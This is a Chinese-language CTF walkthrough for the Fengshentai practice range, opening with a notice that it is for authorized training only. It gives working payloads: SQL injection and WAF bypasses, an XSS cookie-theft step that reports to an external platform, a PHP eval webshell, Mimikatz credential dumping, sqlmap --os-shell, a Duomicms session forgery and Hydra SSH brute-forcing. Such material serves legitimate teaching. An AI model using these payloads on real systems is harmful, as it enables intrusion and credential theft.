为掌控安全旗下最具代表性的入门级渗透靶场,封神台凭借剧情化的关卡设计、循序渐进的难度曲线以及完全免费的在线环境,成为无数网络安全初学者的入门首选。其中「尤里的复仇」三部曲与「Kali 渗透系列」两大主线,覆盖了从基础 Web 漏洞到实战渗透的完整知识体系。
本文将系统梳理封神台全部主流靶场的通关思路与核心 Payload,从 SQL 注入到提权、从信息收集到服务爆破,帮你建立完整的渗透测试思维链路。
合规提示:本文所有技术仅用于授权靶场练习与学习,严禁对未授权的真实网站或服务器实施攻击,遵守《网络安全法》与职业道德。
一、靶场体系总览
封神台的核心靶场分为两大系列,难度由浅入深:
表格
| 系列 | 关卡数 | 核心考点 | 难度 |
|---|---|---|---|
| 尤里的复仇 Ⅰ | 7 关 | SQL 注入、WAF 绕过、XSS、越权、文件上传、系统提权、密码抓取 | ★★☆ |
| 尤里的复仇 Ⅱ 回归 | 7 关 | 信息收集、目录扫描、SQL 注入绕过、Getshell、AWD 攻防、Fuzz | ★★★ |
| 尤里的复仇 Ⅲ 进击的尤里 | 3 关 | 邮件钓鱼、线索溯源、CMS 变量覆盖漏洞、后台 GetShell | ★★★☆ |
| Kali 渗透系列 | 4 关 | Sqlmap 实操、后台 GetShell、OS-Shell 提权、Hydra 服务爆破 | ★★★ |
二、尤里的复仇 Ⅰ:小芳系列(最经典入门篇)
这是封神台最知名的入门系列,以完整的渗透链路著称,从发现注入到拿到系统权限一气呵成。
第一章:为了女神小芳 —— 数字型 SQL 显注
考点:GET 型数字联合查询注入通关步骤:
- 进入新闻详情页
?id=1,分别测试and 1=1与and 1=2,页面返回差异确认数字型注入 order by 2正常、order by 3报错,确认字段数为 2- 构造联合查询,id 设为负数使原查询失效:
plaintext
?id=-1 union select 1,group_concat(username,0x3a,password) from admin- 页面直接返回
admin:hellohack,密码即为 Flag
第二章:遇到阻难 —— Cookie 注入绕过 WAF
考点:WAF 防护机制缺陷 + Cookie 注入核心思路:WAF 仅过滤 URL 参数,未校验 Cookie通关步骤:
- URL 传参触发 WAF 拦截,确认防护范围
- Burp 抓包,删除 URL 中的 id 参数,在 Cookie 字段添加
id=1,页面正常返回 - 在 Cookie 中执行注入:
plaintext
Cookie: id=-1 union select 1,2 from admin- 逐步脱库获取管理员密码,进入后台
第三章:为了更多权限 —— 存储型 XSS 窃 Cookie
考点:存储型 XSS + 管理员 Cookie 窃取通关步骤:
- 留言板输入
<script>alert(1)</script>验证漏洞 - 打开 XSS 在线平台(xsshs.cn)新建项目,复制远程加载脚本
- 将 Payload 提交到留言板,等待管理员机器人访问
- XSS 平台收到 Cookie,其中包含
zkz{}格式的 Flag
第四章:进击 —— Cookie 垂直越权
考点:身份认证缺陷 + 垂直越权通关步骤:
- 复制上一关获取的管理员 Cookie
- F12 开发者工具 → Application → Cookies,替换当前页面 Cookie
- 刷新页面,直接绕过登录进入管理员后台
第五章:拿到 Web 最高权限 —— 文件上传漏洞
考点:黑名单过滤绕过 + IIS 解析漏洞通关步骤:
- 后台头像上传点,黑名单禁止 php 后缀
- 按优先级尝试绕过:
- 大小写绕过:
shell.PhP - 后缀点绕过:
shell.php. - IIS 解析:
shell.asp;.jpg或改为.cer后缀
- 大小写绕过:
- 上传成功后用蚁剑连接,在网站根目录找到 flag 文件
第六章:SYSTEM POWER —— 本地提权
考点:Windows 系统本地溢出提权通关步骤:
- 通过 Webshell 上传提权工具(iis6.exe)
- 虚拟终端执行提权命令,获取 SYSTEM 权限
- 读取 C 盘根目录 flag.txt
第七章:GET THE PASS —— 明文密码抓取
考点:Mimikatz 抓取系统密码通关步骤:
- 上传 mimikatz.exe 到服务器
- 依次执行:
plaintext
privilege::debug sekurlsa::logonPasswords- 获取管理员 NTLM 哈希,解密后得到明文密码
三、尤里的复仇 Ⅱ:回归(进阶实战篇)
第二部难度明显提升,更注重信息收集能力与漏洞绕过思维,共 7 个关卡。
第一关:归来 - 脚踏实地
考点:目录扫描 + 源码信息泄露通关思路:
- 使用御剑或 dirsearch 扫描网站目录
- 重点扫描
files/、install/等敏感目录 - 在安装包或源码文件中找到默认账号密码或 Flag
- 部分环境可通过
robots.txt找到隐藏路径
第二、三关:渗透第一步 - 信息收集
考点:子域名探测 + 端口扫描 + 旁站信息搜集通关思路:
- 子域名爆破:使用 layer 或子域名扫描工具,发现同 IP 下的其他站点
- 端口扫描:
nmap -sS -n -A 目标IP,发现非标准端口的 Web 服务 - 旁站查询:通过同 IP 网站查询工具,找到虚拟主机上的其他站点
- 通常 Flag 藏在旁站的 robots.txt 或默认页面中
第四关:sqlmap 尝鲜题
考点:Sqlmap 基础使用通关思路:
- 找到注入点后,使用 Sqlmap 自动化脱库
- 基础命令:
bash
运行
sqlmap -u "目标URL?id=1" --dbs sqlmap -u "目标URL?id=1" -D 库名 --tables sqlmap -u "目标URL?id=1" -D 库名 -T 表名 --dump- 找到 admin 表中的管理员密码,MD5 解密后提交
第五关:SQL 注入绕过防护 Getshell
考点:SQL 注入关键字过滤绕过通关思路:
- 测试发现 and、union 等关键字被过滤
- 使用双写绕过:
ununionion、selselectect - 或使用百分号拆分、内联注释绕过
- 注入成功后利用
--os-shell参数直接获取系统权限
第六关:AWD 攻防 - Fuzz 乱拳打死老师傅
考点:模糊测试 + 漏洞挖掘通关思路:
- 对目标站点进行全面目录 Fuzz
- 测试各种输入点的 SQL 注入、XSS、命令执行漏洞
- 重点关注备份文件、phpinfo、测试页面等信息泄露点
- 找到可利用漏洞后获取 Flag
第七关:基础环境搭建
考点:CMS 识别 + 已知漏洞利用通关思路:
- 识别网站使用的 CMS 类型
- 搜索对应 CMS 的已知漏洞
- 利用公开 EXP 获取权限或 Flag
四、尤里的复仇 Ⅲ:进击的尤里(高阶篇)
第三部剧情继续推进,关卡数量不多但难度更高,偏向真实渗透场景。
第八章:来自邹节伦的邮件
考点:邮件钓鱼分析 + 附件病毒分析通关思路:
- 分析邮件头信息,追踪发件人 IP 与路径
- 分析邮件附件中的恶意文档或脚本
- 从恶意代码中提取隐藏的 Flag 或线索
- 部分关卡需要逆向分析宏代码或脚本逻辑
第九章:发现线索
考点:信息溯源 + 线索关联通关思路:
- 根据上一关获取的线索继续深入
- 搜索相关域名、IP、社交账号等信息
- 通过开源情报(OSINT)收集更多目标信息
- 找到下一关的入口地址或关键凭证
第十章:看你是否能进入后台
考点:Duomicms 变量覆盖漏洞 + 后台 GetShell通关思路:
- 御剑扫描后台路径,找到登录入口
- 识别 CMS 为 Duomicms,利用其经典变量覆盖漏洞
- 构造 Payload 直接伪造管理员 Session:
plaintext
interface/comment.php?_SESSION[duomi_admin_id]=1&_SESSION[duomi_admin_name]=admin- 直接进入后台,在模板编辑处写入一句话木马 GetShell
五、Kali 渗透系列新靶场(工具实战篇)
Kali 系列主打工具实操,每一关对应一个经典渗透工具的使用,共 4 关。
第一关:Sqlmap 实操靶场
考点:Sqlmap POST 注入 + 后台脱库通关步骤:
- 目录扫描发现
/admin后台登录页 - Burp 抓登录包,保存为 txt 文件
- Sqlmap 加载数据包跑注入:
bash
运行
sqlmap -r post.txt --batch --dbs- 找到 qcms 库中的 qcms_admin 表,获取管理员密码哈希
- MD5 解密后得到 Flag
避坑提示:后台页面显示的 flag {sqlmappy1k} 是干扰项,真正的 Flag 是管理员密码解密结果
第二关:拿下目标服务器
考点:后台 GetShell + 蚁剑连接通关步骤:
- 用上一关获取的账号密码登录后台
- 找到模板编辑或文件管理功能,无严格过滤
- 直接写入一句话木马:
<?php @eval($_POST['a']);?> - 中国蚁剑连接,在网站目录找到 flag.php
第三关:通过 Sqlmap 直接获得服务器权限
考点:Sqlmap --os-shell 直接拿系统权限通关步骤:
- 找到 SQL 注入点,确认 DBA 权限
- 使用 os-shell 参数直接获取交互式 Shell:
bash
运行
sqlmap -u "注入点URL" --os-shell --batch- 进入 Shell 后查看根目录 flag.php 文件
- 或通过 Sqlmap 上传一句话木马,用蚁剑连接管理
第四关:Hydra 爆破服务器登陆密码
考点:Hydra 九头蛇工具 + SSH 服务爆破通关步骤:
- 端口扫描确认目标开放 22 端口(SSH 服务)
- 准备用户名字典与密码字典(Kali 自带
/usr/share/wordlists/) - 使用 Hydra 爆破 SSH 登录:
bash
运行
hydra -L 用户字典.txt -P 密码字典.txt -t 5 -vV 目标IP ssh- 爆破成功后得到账号密码,即为 Flag
常用参数说明:
-l指定单个用户名,-L指定用户名字典-p指定单个密码,-P指定密码字典-t指定线程数-vV显示详细爆破过程-f找到第一个正确结果即停止
六、萌新通用通关方法论
信息收集万能流程
遇到任何新靶场,按以下顺序排查,90% 的关卡都能找到突破口:
- 目录扫描:御剑 /dirsearch 扫后台、备份、敏感文件
- 端口扫描:nmap 扫非标准端口服务
- CMS 识别:确定建站程序,搜索已知漏洞
- 参数测试:所有带参数的 URL 先测 SQL 注入
- 输入框测试:留言、搜索、登录框测 XSS 和注入
- 上传功能:直接测文件上传漏洞
- 权限测试:修改 Cookie、ID 参数测越权
高频卡坑避坑指南
- SQL 注入无回显:id 参数设为负数,原查询失效后才能看到 union 结果
- WAF 拦截:优先试 Cookie 注入、Referer 注入,不要死磕 URL
- XSS 弹窗不算过:必须用在线平台接收管理员 Cookie
- 文件上传失败:IIS 环境优先试
.cer后缀,比图片马成功率高 - URL 注释失效:地址栏中
#需转义为%23,否则被浏览器截断 - 工具跑不出结果:降低线程、增加延时,避免靶场封禁
写在最后
封神台靶场最大的价值,不在于收集了多少个 Flag,而在于通过剧情化的关卡设计,让初学者建立起完整的渗透测试思维:从信息收集到漏洞发现,从利用绕过再到权限提升,每一步都对应真实攻防场景中的标准动作。建议第一遍可以跟着教程通关熟悉流程,第二遍尝试脱离教程手工注入、自主寻找漏洞,真正吃透每一个漏洞的原理与利用方式。当你能不看教程完整打通尤里的复仇全系列时,Web 安全的基础体系也就基本建立了。